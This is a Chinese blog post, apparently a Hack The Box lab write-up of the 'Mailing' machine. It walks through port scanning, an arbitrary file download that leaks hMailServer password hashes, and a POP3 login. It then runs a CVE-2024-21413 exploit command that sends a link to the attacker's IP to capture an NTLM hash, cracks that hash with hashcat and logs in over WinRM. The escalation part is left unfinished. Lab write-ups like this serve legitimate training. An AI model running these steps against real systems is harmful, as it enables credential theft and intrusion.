htb-Mailing

最新推荐文章于 2024-06-03 15:09:52 发布
最新推荐文章于 2024-06-03 15:09:52 发布
阅读量1k 收藏 10
点赞数 31
分类专栏: HTB 文章标签: hackthebox 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/whale_waves/article/details/138896310
版权

因为做windows服务器渗透较少,不妥的地方还请师傅们指出

可先看思路,实在不行再看writeup

任意文件下载拿pop3登录邮箱——》利用邮件服务器漏洞拿下NTLM——》利用组件版本漏洞拿下

拿shell

端口扫描开放服务

Host is up (0.91s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT    STATE SERVICE       VERSION
25/tcp  open  smtp          hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp  open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: Mailing
110/tcp open  pop3          hMailServer pop3d
|_pop3-capabilities: TOP UIDL USER
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
143/tcp open  imap          hMailServer imapd
|_imap-capabilities: IDLE ACL OK completed IMAP4 CAPABILITY QUOTA NAMESPACE IMAP4rev1 RIGHTS=texkA0001 SORT CHILDREN
445/tcp open  microsoft-ds?
465/tcp open  ssl/smtp      hMailServer smtpd
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
|_smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ssl-date: TLS randomness does not represent time
587/tcp open  smtp          hMailServer smtpd
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
|_ssl-date: TLS randomness does not represent time
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
993/tcp open  ssl/imap      hMailServer imapd
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2024-05-15T01:59:24
|_  start_date: N/A
|_clock-skew: -13s

从端口扫描的情况来看,似乎是一个hmailserver的邮件服务器

端口服务
21smtp
80http
110pop3
135msrpc
139netbios-ssn
143imap
445microsoft-ds
465ssl-smtp
587

smtp

993ssl/imap

还是先去访问看web网站

web渗透

注意把域名写进hosts里

这里注意到download instuctions,第一反应就是任意文件下载

复制链接,能看到确实有个接入点

尝试下载hosts文件

这里拿到了hosts文件

从这里能知道两点

  1. 存在任意文件下载漏洞
  2. 网站根目录运行在c盘
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
#	127.0.0.1       localhost
#	::1             localhost

127.0.0.1	mailing.htb

后续思路就是获取配置文件,尝试登录邮件服务器

知道服务器搭建的是hmailserver的邮件服务器,搜索他的配置文件目录

Program Files (x86)/hMailServer/Bin/hMailServer.INI

这里能看到拿到了Administrator的hash

[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1

拿给hash-identifier看是那种加密

MD5加密直接网站上解码即可

这里附上解密网站

MD5 在線免費解密 MD5、SHA1、MySQL、NTLM、SHA256、SHA512、Wordpress、Bcrypt 的雜湊 (hashes.com)

拿到密码

Administrator的hash:homenetworkingadministrator

尝试telnet登录pop3

这里简单介绍一点pop3常用命令

Post Office Protocol version 3 (POP3) 是一种用于从远程邮件服务器下载电子邮件的协议。以下是一些常见的 POP3 命令以及它们的作用:

  1. USER <username>

    • 描述:指定用户名。
    • 示例USER example

  2. PASS <password>

    • 描述:指定用户的密码。
    • 示例PASS password123

  3. STAT

    • 描述:返回邮箱中的邮件数量和总大小。
    • 示例STAT

  4. LIST [msg]

    • 描述:列出邮箱中所有邮件,或者指定邮件的编号和大小。
    • 示例LIST 或 LIST 1

  5. RETR <msg>

    • 描述:检索指定的邮件内容。
    • 示例RETR 1

  6. DELE <msg>

    • 描述:删除指定的邮件,直到会话结束前才实际删除。
    • 示例DELE 1

  7. NOOP

    • 描述:无操作,只是为了保持连接活跃。
    • 示例NOOP

  8. RSET

    • 描述:重置会话状态,取消所有已标记为删除的邮件。
    • 示例RSET

  9. QUIT

    • 描述:结束会话并关闭连接,删除所有在会话期间标记为删除的邮件。
    • 示例QUIT

  10. TOP <msg> <n>

    • 描述:检索指定邮件的前 n 行内容,不包含邮件的完整主体。
    • 示例TOP 1 10

  11. UIDL [msg]

    • 描述:唯一标识符列表,返回邮箱中每个邮件的唯一标识符。
    • 示例UIDL 或 UIDL 1

telnet 10.10.11.14 110

USER administrator@mailing.htb

PASS homenetworkingadministrator

进入pop3,没有什么可用信息

到这里思路就断了,尝试搜索hMailServer漏洞的漏洞

能找到一个远程rce,继续了解看是否有什么条件

CVE-2024-21413

xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability:Microsoft-Outlook-Remote-Code-Execution-Vulnerability (github.com)

简介

Microsoft Office Outlook是微软office的组件之一,也是常用的邮件客户端之一。CVE-2024-21413 是在 Microsoft Outlook 中发现的一个重大安全漏洞,CVSS 评分 9.8。攻击者将一个带恶意链接的邮件发送给被攻击用户,当用户点击链接时,会导致NTLM窃取与远程代码执行(RCE),并且该漏洞还能使攻击者能够绕过Office文档的受保护视图。本文先讲复现过程,后讲漏洞原理。

这里简单解释一下NTLM,其实是类似于linux的shadow文件里的用户hash,只是加密方式是NTLM

!!!这里因为某些环境问题没有去设置NTLM监听而是Wireshark抓的数据包!!!

如果实在需要监听NTLM可以去看

CVE-2024-21413 Outlook远程代码执行漏洞分析 - FreeBuf网络安全行业门户

python3 1.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url "\\10.10.16.8\test\meeting" --subject "test"

maya::MAILING:5e0eb9256971de1f:DEBA7F01E81351DCFEDA3C905CA932E8:010100000000000080BA1036359FDA01E3495C93763B0B450000000002000800460042005600410001001E00570049004E002D003300410035005400350049004F00550048003800330004003400570049004E002D003300410035005400350049004F0055004800380033002E0046004200560041002E004C004F00430041004C000300140046004200560041002E004C004F00430041004C000500140046004200560041002E004C004F00430041004C000700080080BA1036359FDA010600040002000000080030003000000000000000000000000020000080F0D79319E6BB3D505B32F68F03892752BD8DD6272B1FBD42563DB8BA2BE13A0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000

拿到NTLM以后使用hashcat解密,这里使用的是kali自带的dict字典爆破

hashcat -a 0 -m 5600 1.txt ./tools/密码爆破/字典/dict.txt -o 2.txt -O

拿到密码m4y4ngs4ri

用户名maya:密码m4y4ngs4ri

到这里已经拿到了登录的账户以及密码,现在就需要考虑怎么上线,从开放的端口来看并没有什么可用信息,尝试扫一下全端口

这里使用另一个除了nmap以外很好用的扫描工具fscan

GitHub - shengshengli/fscan: 一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。

内外网都可扫,并且速度比nmap快很多

fscan -h 10.10.11.14 -p 1-65535

从这里看除了刚开始扫出来的端口,这里漏扫了5040、5985、7680

5985端口是Windows Remote Management(WinRM)服务的默认端口。WinRM是一种远程管理协议,用于在Windows操作系统上进行远程管理和执行命令。通过5985端口,可以使用WinRM协议与目标Windows主机建立连接,并进行诸如远程执行命令、配置管理、监视等操作。

使用WinRM我们可以在对方有设置防火墙的情况下远程管理这台服务器,因为启动WinRM服务后,防火墙默认会放行5985端口。WinRM服务在Windows Server 2012以上服务器自动启动。在WindowsVista上,服务必须手动启动。WinRM的好处在于,这种远程连接不容易被察觉到,也不会占用远程连接数!

这里使用红队神器evil-winrm

Hackplayers/evil-winrm: The ultimate WinRM shell for hacking/pentesting (github.com)

ruby evil-winrm.rb -i 10.10.11.14 -u maya -p 'm4y4ngs4ri'

到这里就拿到了第一个flag(在桌面上##desktop)

提权

CVE-2023-2255

elweth-sec/CVE-2023-2255:CVE-2023-2255 Libre Office (github.com)

影响版本

7.4-7.47      7.5-7.53

这一题主要是考察Program Files中的组件提权

Program Files:该文件夹用于存放安装的应用程序和软件

Program Files:存放32位的应用程序和软件,对于某些64为电脑也会一些把32位程序放在这个位置

这里能看到他的版本是7.4版本

因为后续需要执行程序,所以需要找到一个此用户可以执行程序的文件夹

使用get-acl命令可查看文件夹访问控制列表 (ACL) 的示例输出

get-acl 'Important Documents'

从下列信息来看,此文件夹所有者是localadmin,但是maya同样有权限,所以后续操作在此文件夹下执行

到此因为技术问题就没有向后继续做了,windows的渗透知识还是太浅,希望各位师傅看到后可以指点一二

怪兽不会rap_哥哥我会crash
关注
  • 31
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
HTB 靶场 Mailing 未完待续
m0_62438849的博客
06-04 946
访问网页在/etc/hosts 添加ip和域名hosts 文件包含ip地址与主机名之间的映射,还包括主机的别名。Linux系统所有程序查询/etc/hosts文件解析对主机名或者域名的IP地址。没有找到就需要使用DNS服务器解释域名。
OpenSSH 安全漏洞(CVE-2023-51385) 升级v9(1),2024年最新网络安全面试基础知识
芯_v_648374雨馨博客
04-18 431
检查相应配置文件后,还原备份文件(可选)
Weblogic反序列化漏洞原理分析及漏洞复现(CVE-2024-2628 CVE-2024-21839复现)_weblogic payload(1)
2301_77121488的博客
05-13 1054
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
CVE-2023-36025 Windows SmartScreen 安全功能绕过漏洞
cc123489ll的博客
05-31 731
CVE-2023-36025是微软于11月补丁日发布的安全更新中修复WindowsSmartScreen安全功能绕过漏洞。攻击者可以通过诱导用户单击特制的URL来利用该漏洞,对目标系统进行攻击。成功利用该漏洞的攻击者能够绕过WindowsDefender SmartScreen检查及其相关提示。该漏洞的攻击复杂性较低,可创建并诱导用户点击恶意设计的 Internet 快捷方式文件(.URL) 或指向此类文件的超链接来利用该漏洞,无需特殊权限即可通过互联网进行利用。
Weblogic反序列化漏洞原理分析及漏洞复现(CVE-2018-2628/CVE-2023-21839复现)
rumil的博客
09-19 6185
WebLogic 存在远程代码执行漏洞(CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。远程方法调用,除了该对象本身的虚拟机,其它的虚拟机也可以调用该对象的方法。
CVE-2023-46604复现学习
shierbai的博客
05-19 590
Apache ActiveMQ是一个开源的、功能强大的消息代理(Message Broker),由 Apache Software Foundation 所提供。ActiveMQ 支持 Java Message Service(JMS)1.1 和 2.0规范,提供了一个高性能、简单、灵活和支持多种语言(Java, C, C++, Ruby, Python, Perl等)的消息队列系统。OpenWire协议在ActiveMQ中被用于多语言客户端与服务端通信。
探索Confluence安全漏洞利用:ConfluenceMemshell详解
gitblog_00017的博客
05-31 584
探索Confluence安全漏洞利用:ConfluenceMemshell详解 项目地址:https://gitcode.com/Lotus6/ConfluenceMemshell 1、项目介绍 ConfluenceMemshell 是一个针对Confluence服务器的漏洞利用工具,设计用于利用CVE-2021-26084、CVE-2022-26134以及最新的CVE-2023系列漏洞。这个开源...
HTB-Solutions
03-09
HTB-Solutions
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
my-htb-tools3
03-19
my-htb-tools3
HTB-writeups:此仓库包含HackTheBox的文章
05-01
HTB内容此存储库包含针对HackTheBox挑战,机器和专业实验室的文章。
如何看待mybatis-plus这个cve漏洞及声明
怀揣梦想,一颗执着于技术的心从未磨灭,内心住着一颗顽强的小强时刻提醒自己层层突破自我,同时也成就他人
05-31 919
该组件在3.5.3.1及之前版本中,由于TenantHandler#getTenantId方法在构造SQL表达式时未对tenant(租户)ID值进行过滤,当程序启用了TenantPlugin并且tenant ID可由外部用户控制时,攻击者可以利用此漏洞进行SQL注入,接管程序的数据库或发送恶意命令。MyBatis-Plus的CVE漏洞是一个严重的问题,但通过及时升级版本、过滤输入和遵循最佳实践等措施,开发者可以有效地降低安全风险并保护系统的安全性。
探索安全漏洞CVE-2023-24055:KeePass 2.5x的预防与应对策略
gitblog_00037的博客
05-25 534
探索安全漏洞CVE-2023-24055:KeePass 2.5x的预防与应对策略 项目地址:https://gitcode.com/alt3kx/CVE-2023-24055_PoC 一、项目介绍 随着密码管理的重要性日益凸显,KeePass因其可靠性和开源性质而备受推崇。然而,最近披露的CVE-2023-24055暴露了其2.5x版本的一个重大安全问题:恶意攻击者能够通过修改配置文件触发数据...
hvv 前网安人必读的漏洞清单(2024年)
2401_84466229的博客
05-28 1867
数字化浪潮席卷全球,安全漏洞的发现和利用频率正以惊人的速度上升,尤其是工业自动化、绿色能源、财经领域、交通系统、国家防务以及医疗行业等关键部门,成为了网络攻击者的主要目标。数据侵犯和勒索软件的攻击层出不穷,凸显了安全漏洞正被黑客用作主要的攻击渠道。本文梳理、分析了 2023 年危害巨大、影响范围广泛、且攻击手法多变的漏洞,旨在为网络安全界的实践者们提供一个详细的漏洞信息概览,帮助安全从业者能够更全面地掌握这些安全威胁,并据此构建更为坚固的安全防线。
探秘网络安全新星:CVE-2023-4863/CVE-2023-41064 PoC 工具
gitblog_00100的博客
05-25 445
探秘网络安全新星:CVE-2023-4863/CVE-2023-41064 PoC 工具 项目地址:https://gitcode.com/mistymntncop/CVE-2023-4863 在这个数字化的时代,网络安全的重要性不言而喻。为了保障网络的健康和安全,开发者们不断挑战新的漏洞,寻找解决方案。今天,我们将向您推荐一个专注于CVE-2023-4863漏洞的Proof-of-Concept...
20232906 2023-2024-2 《网络与系统攻防技术》第十一次作业
mar-velous的博客
05-27 1144
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。
CraftCMS ConditionsController.php 代码执行漏洞(CVE-2023-41892)
0xSec
05-31 567
CraftCMS在4.4.15版本之前存在远程代码执行漏洞,攻击者可构造恶意请求执行任意代码,控制服务器。
高危漏洞处置时限/高危漏洞用不用修复-零基础漏洞教学
最新发布
2401_84915584的博客
06-03 551
阅读: 965一、漏洞概述12月13日,绿盟科技CERT监测到微软发布12月安全更新补丁,修复了34个安全问题
format htb
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios and practice their skills in a safe and controlled environment. The format of HTB typically involves a series of machines or challenges that users need to exploit to gain root access or find flags. Participants can use various tools and techniques to solve the challenges and improve their knowledge of cybersecurity.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怪兽不会rap_哥哥我会crash

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值